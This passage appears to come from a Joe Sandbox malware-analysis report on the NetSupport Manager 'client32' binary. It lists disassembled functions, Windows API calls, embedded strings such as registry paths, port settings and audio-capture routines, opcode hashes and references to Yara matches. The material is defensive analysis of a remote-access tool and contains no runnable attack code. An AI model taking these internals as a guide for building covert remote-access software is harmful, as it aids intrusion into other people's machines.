                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorExitLastLocalMessageProcessTimeValue_sprintf_strncpywsprintf
                                                                                  • String ID: @ %s$%04d/%02d/%02d %02d:%02d:%02d$%s, %d$*** Warning. Failed Attack %u, from %s, at %s$FailedAttacks$Info. Connection Rejected, reason=%d$IsA()$LastAttack$LastAttacker$NC-$Software\Productive Computer Insight\Client32$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                  • API String ID: 3341947355-3231647555
                                                                                  • Opcode ID: 64337eb117a7921071321d93dca20efb02aada447dc6f5f42f1380f107080c29
                                                                                  • Instruction ID: fe029f2b4bd5101e4da145cc81d4ac0798fef8b5c75ba173e470820e68b704ff
                                                                                  • Opcode Fuzzy Hash: 64337eb117a7921071321d93dca20efb02aada447dc6f5f42f1380f107080c29
                                                                                  • Instruction Fuzzy Hash: 34916075E00219AFEB10CFA9CC84FEEFBB4EF45704F148199E549A7281EB716A44CB61
                                                                                  Function 11047010 Relevance: 26.5, APIs: 7, Strings: 8, Instructions: 214COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _calloc.LIBCMT ref: 1104702F
                                                                                  • wsprintfA.USER32 ref: 110470AE
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  • wsprintfA.USER32 ref: 110470E9
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,00000014,00000080), ref: 11047203
                                                                                  • _strrchr.LIBCMT ref: 1104720C
                                                                                  • GetWindowsDirectoryA.KERNEL32(00000016,00000080), ref: 11047235
                                                                                  • _free.LIBCMT ref: 11047251
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: wsprintf$DirectoryErrorExitFileLastMessageModuleNameProcessWindows_calloc_free_strrchr
                                                                                  • String ID: %s %s$CLTCONN.CPP$NSA %s$NSS$V1.10$V12.00$V12.10$V12.10F20
                                                                                  • API String ID: 1757445300-1785190265
                                                                                  • Opcode ID: 24c3795b5edef53b19da24d8b2da5203a0cff33bf5a432e62935ac5c0fdc3eed
                                                                                  • Instruction ID: 26d4bceacdf9fffedd66530a5670ce95754bb6fc5caa385817b5218b2f2053ae
                                                                                  • Opcode Fuzzy Hash: 24c3795b5edef53b19da24d8b2da5203a0cff33bf5a432e62935ac5c0fdc3eed
                                                                                  • Instruction Fuzzy Hash: 3F619A78E00657ABD714CFB48CC1B6FF7E99F40308F1048A8ED5697641EA62F904C3A2
                                                                                  Function 1100B440 Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 190fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                  • _malloc.LIBCMT ref: 1100B496
                                                                                    • Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
                                                                                    • Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
                                                                                    • Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56
                                                                                    • Part of subcall function 1100AD10: EnterCriticalSection.KERNEL32(000000FF,50D94AA1,?,00000000,00000000), ref: 1100AD54
                                                                                    • Part of subcall function 1100AD10: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1100AD72
                                                                                    • Part of subcall function 1100AD10: GetProcAddress.KERNEL32(?,CancelIo), ref: 1100ADBE
                                                                                    • Part of subcall function 1100AD10: InterlockedExchange.KERNEL32(?,000000FF), ref: 1100AE05
                                                                                    • Part of subcall function 1100AD10: CloseHandle.KERNEL32(00000000), ref: 1100AE0C
                                                                                    • Part of subcall function 1100AD10: _free.LIBCMT ref: 1100AE23
                                                                                    • Part of subcall function 1100AD10: FreeLibrary.KERNEL32(?), ref: 1100AE3B
                                                                                    • Part of subcall function 1100AD10: LeaveCriticalSection.KERNEL32(?), ref: 1100AE45
                                                                                  • EnterCriticalSection.KERNEL32(1100CB8A,Audio,DisableSounds,00000000,00000000,50D94AA1,?,1100CB7A,00000000,?,1100CB7A,?), ref: 1100B4CB
                                                                                  • CreateFileA.KERNEL32(\\.\NSAudioFilter,C0000000,00000000,00000000,00000003,40000000,00000000,?,1100CB7A,?), ref: 1100B4E8
                                                                                  • _calloc.LIBCMT ref: 1100B519
                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,1100CB7A,?), ref: 1100B53F
                                                                                  • LeaveCriticalSection.KERNEL32(1100CB8A,?,1100CB7A,?), ref: 1100B579
                                                                                  • LeaveCriticalSection.KERNEL32(1100CB7A,?,?,1100CB7A,?), ref: 1100B59E
                                                                                  Strings
                                                                                  • DisableSounds, xrefs: 1100B472
                                                                                  • \\.\NSAudioFilter, xrefs: 1100B4E0
                                                                                  • Error. Vista AudioCapture GetInstance ret %s, xrefs: 1100B5F3
                                                                                  • Vista new pAudioCap=%p, xrefs: 1100B603
                                                                                  • Vista AddAudioCapEvtListener(%p), xrefs: 1100B623
                                                                                  • InitCaptureSounds NT6, xrefs: 1100B5BE
                                                                                  • Audio, xrefs: 1100B477
                                                                                  • Error. Vista AddAudioCaptureEventListener ret %s, xrefs: 1100B64C
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$Leave$CreateEnterLibrary$AddressAllocateCloseEventExchangeFileFreeHandleHeapInterlockedLoadProc__wcstoi64_calloc_free_malloc
                                                                                  • String ID: Audio$DisableSounds$Error. Vista AudioCapture GetInstance ret %s$Error. Vista AddAudioCaptureEventListener ret %s$InitCaptureSounds NT6$Vista AddAudioCapEvtListener(%p)$Vista new pAudioCap=%p$\\.\NSAudioFilter
                                                                                  • API String ID: 1843377891-2362500394
                                                                                  • Opcode ID: 1fe7b9b6c0f710ae84cdce54030855f788110a3df0201f205448bfee00d84397
                                                                                  • Instruction ID: 79732c4921e51442e8b050610a6755ede2f12e6e97fc197f43339bcf40ac1e73
                                                                                  • Opcode Fuzzy Hash: 1fe7b9b6c0f710ae84cdce54030855f788110a3df0201f205448bfee00d84397
                                                                                  • Instruction Fuzzy Hash: A25129B5E44A4AEFE704CF64DC80B9AF7A4FB05359F10467AE92993240E7317550CBA1
                                                                                  Function 1102B920 Relevance: 24.7, APIs: 6, Strings: 8, Instructions: 220COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  • GetLastError.KERNEL32(?), ref: 1102BA81
                                                                                  • GetLastError.KERNEL32(?), ref: 1102BADE
                                                                                  • _fgets.LIBCMT ref: 1102BB10
                                                                                  • _strtok.LIBCMT ref: 1102BB38
                                                                                    • Part of subcall function 11163ED6: __getptd.LIBCMT ref: 11163EF4
                                                                                  • _fgets.LIBCMT ref: 1102BB74
                                                                                  • _strtok.LIBCMT ref: 1102BB88
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$_fgets_strtok$ExitMessageProcess__getptdwsprintf
                                                                                  • String ID: *LookupFile$IsA()$LookupFileUser$WARN: Could not open TS lookup file: "%s" (%d), user="%s"$WARN: LoginUser failed (%d) user="%s"$WARN: No TS lookup file specified!$WARN: clientname is empty!$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                  • API String ID: 78526175-1484737611
                                                                                  • Opcode ID: 832a1d2afe1d7addcbbc1c9479bfaaca6dd03d7c44e3f0c4f70082954299c4cb
                                                                                  • Instruction ID: 5d6f4620134fd972b767ce717457c33aaf76edba5691a1b8f6aa8fc2ebdb03c0
                                                                                  • Opcode Fuzzy Hash: 832a1d2afe1d7addcbbc1c9479bfaaca6dd03d7c44e3f0c4f70082954299c4cb
                                                                                  • Instruction Fuzzy Hash: EA81F876D00A2D9BDB21DB94DC80FEEF7B8AF04309F4404D9D919A3244EA71AB84CF91
                                                                                  Function 1115B5D0 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 94libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                    • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                    • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                  • LoadLibraryA.KERNEL32(wlanapi.dll,?,?,?,?,11058627), ref: 1115B61B
                                                                                  • GetProcAddress.KERNEL32(00000000,WlanOpenHandle), ref: 1115B634
                                                                                  • GetProcAddress.KERNEL32(?,WlanCloseHandle), ref: 1115B644
                                                                                  • GetProcAddress.KERNEL32(?,WlanEnumInterfaces), ref: 1115B654
                                                                                  • GetProcAddress.KERNEL32(?,WlanGetAvailableNetworkList), ref: 1115B664
                                                                                  • GetProcAddress.KERNEL32(?,WlanFreeMemory), ref: 1115B674
                                                                                  • std::exception::exception.LIBCMT ref: 1115B68D
                                                                                  • __CxxThrowException@8.LIBCMT ref: 1115B6A2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressProc$Exception@8LibraryLoadThrow_malloc_memsetstd::exception::exceptionwsprintf
                                                                                  • String ID: WlanCloseHandle$WlanEnumInterfaces$WlanFreeMemory$WlanGetAvailableNetworkList$WlanOpenHandle$wlanapi.dll
                                                                                  • API String ID: 2439742961-1736626566
                                                                                  • Opcode ID: 6cb80e4ba42ffe2f6d3fe0fc7e02658a82289641e696ec289b07654b65deaaf3
                                                                                  • Instruction ID: ed2c7270a583f493e0b466c25834e96d487c817f3cd2eef84f0062ec4251f30e
                                                                                  • Opcode Fuzzy Hash: 6cb80e4ba42ffe2f6d3fe0fc7e02658a82289641e696ec289b07654b65deaaf3
                                                                                  • Instruction Fuzzy Hash: 1721CEB9A013249FC350DFA9CC80A9AFBF8AF58204B14892EE42AD3605E771E400CB95
                                                                                  Function 11121300 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 72COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 1111F440: SelectPalette.GDI32(?,?,00000000), ref: 1111F4BC
                                                                                    • Part of subcall function 1111F440: SelectPalette.GDI32(?,?,00000000), ref: 1111F4D1
                                                                                    • Part of subcall function 1111F440: DeleteObject.GDI32(?), ref: 1111F4E4
                                                                                    • Part of subcall function 1111F440: DeleteObject.GDI32(?), ref: 1111F4F1
                                                                                    • Part of subcall function 1111F440: DeleteObject.GDI32(?), ref: 1111F516
                                                                                  • _free.LIBCMT ref: 1112131D
                                                                                    • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                    • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                  • _free.LIBCMT ref: 11121333
                                                                                  • _free.LIBCMT ref: 11121348
                                                                                  • GdiFlush.GDI32(?,?,?,02648EA0), ref: 11121350
                                                                                  • _free.LIBCMT ref: 1112135D
                                                                                  • _free.LIBCMT ref: 11121371
                                                                                  • SelectObject.GDI32(?,?), ref: 1112138D
                                                                                  • DeleteObject.GDI32(?), ref: 1112139A
                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,02648EA0), ref: 111213A4
                                                                                  • DeleteDC.GDI32(?), ref: 111213CB
                                                                                  • ReleaseDC.USER32(?,?), ref: 111213DE
                                                                                  • DeleteDC.GDI32(?), ref: 111213EB
                                                                                  • InterlockedDecrement.KERNEL32(111EA9C8), ref: 111213F8
                                                                                  Strings
                                                                                  • Error deleting membm, e=%d, xrefs: 111213AB
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Delete$Object_free$Select$ErrorLastPalette$DecrementFlushFreeHeapInterlockedRelease
                                                                                  • String ID: Error deleting membm, e=%d
                                                                                  • API String ID: 3195047866-709490903
                                                                                  • Opcode ID: 856a3ecf5a1c88381e43c7b3755e2998f31a2ff9e92ea80af61142ad3529f9f4
                                                                                  • Instruction ID: f7d3d32e9876efa9dbc162a5d98189d6a342c9de11ba00d9e1d1e6b63679a2c9
                                                                                  • Opcode Fuzzy Hash: 856a3ecf5a1c88381e43c7b3755e2998f31a2ff9e92ea80af61142ad3529f9f4
                                                                                  • Instruction Fuzzy Hash: 892144B96107019BD214DFB5D9C8A9BF7E8FF98319F10491CE9AE83204EB35B501CB65
                                                                                  Function 110537C0 Relevance: 23.1, APIs: 1, Strings: 12, Instructions: 360COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetTickCount.KERNEL32 ref: 11053A8A
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                    • Part of subcall function 11041F40: inet_ntoa.WSOCK32(?,?,?,?,110539A4,00000000,?,?,50D94AA1,?,?), ref: 11041F52
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CountErrorExitLastMessageProcessTickinet_ntoawsprintf
                                                                                  • String ID: %s:%u$Announce Error from %s. Invalid crc - ignoring$Announcement from %s [announcer-apptype: 0x%x] [target-apptype: 0x%x] [flags: 0x%08x]$IsA()$ListenPort$NSMWControl32$NSSWControl32$NSTWControl32$Port$TCPIP$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$port
                                                                                  • API String ID: 3701541597-1781216912
                                                                                  • Opcode ID: 011a09e4ebf555cb1d293c9696a7e6a42301eb6d37c4b5b12f9704b45b5c4a0d
                                                                                  • Instruction ID: 5c383da36f12d4855d2941ef62f3cc5b6d46123aa205a4bcc3d01b822d31dab0
                                                                                  • Opcode Fuzzy Hash: 011a09e4ebf555cb1d293c9696a7e6a42301eb6d37c4b5b12f9704b45b5c4a0d
                                                                                  • Instruction Fuzzy Hash: 3AD1A278E0461AABDF84DF94DC91FEEF7B5EF85308F044159E816AB245EB30A904CB61
                                                                                  Function 110CF130 Relevance: 23.0, APIs: 8, Strings: 5, Instructions: 239COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetDlgItem.USER32(?,000017DD), ref: 110CF18A
                                                                                  • ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
                                                                                  • GetWindowRect.USER32(00000000,?), ref: 110CF1DD
                                                                                  • GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
                                                                                  • GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276
                                                                                  • GetWindowLongA.USER32(00000000,000000F0), ref: 110CF2FC
                                                                                  • GetClientRect.USER32(00000000,?), ref: 110CF3C3
                                                                                  • CreateWindowExA.USER32(00000000,Static,11195264,5000000E,?,?,00000010,00000010,?,00003A97,00000000,00000000), ref: 110CF400
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Window$Rect$ClientCreateItemLongObjectShowText
                                                                                  • String ID: ..\ctl32\nsmdlg.cpp$Static$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_eh$m_hWnd
                                                                                  • API String ID: 4172769820-2231854162
                                                                                  • Opcode ID: 65bc0e660380c42035a20732b64b716a1f83c677b339e53b07408d9ca9b16d2e
                                                                                  • Instruction ID: 2d84ac58a4c57407e54c3cb5711102d4444eebaf719169cc73b89b5b27c55d8a
                                                                                  • Opcode Fuzzy Hash: 65bc0e660380c42035a20732b64b716a1f83c677b339e53b07408d9ca9b16d2e
                                                                                  • Instruction Fuzzy Hash: 8F81C375E00716ABD721CF64CC85F9EB3F4BB88B08F0045ADE5569B680EB74A940CF92
                                                                                  Function 1110F3F0 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 218fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • EnterCriticalSection.KERNEL32(0000017D,50D94AA1,0000017D,?,?,?,?,?,?,?,?,1118B168,000000FF,?,1110F947,00000001), ref: 1110F427
                                                                                  • _memset.LIBCMT ref: 1110F4C2
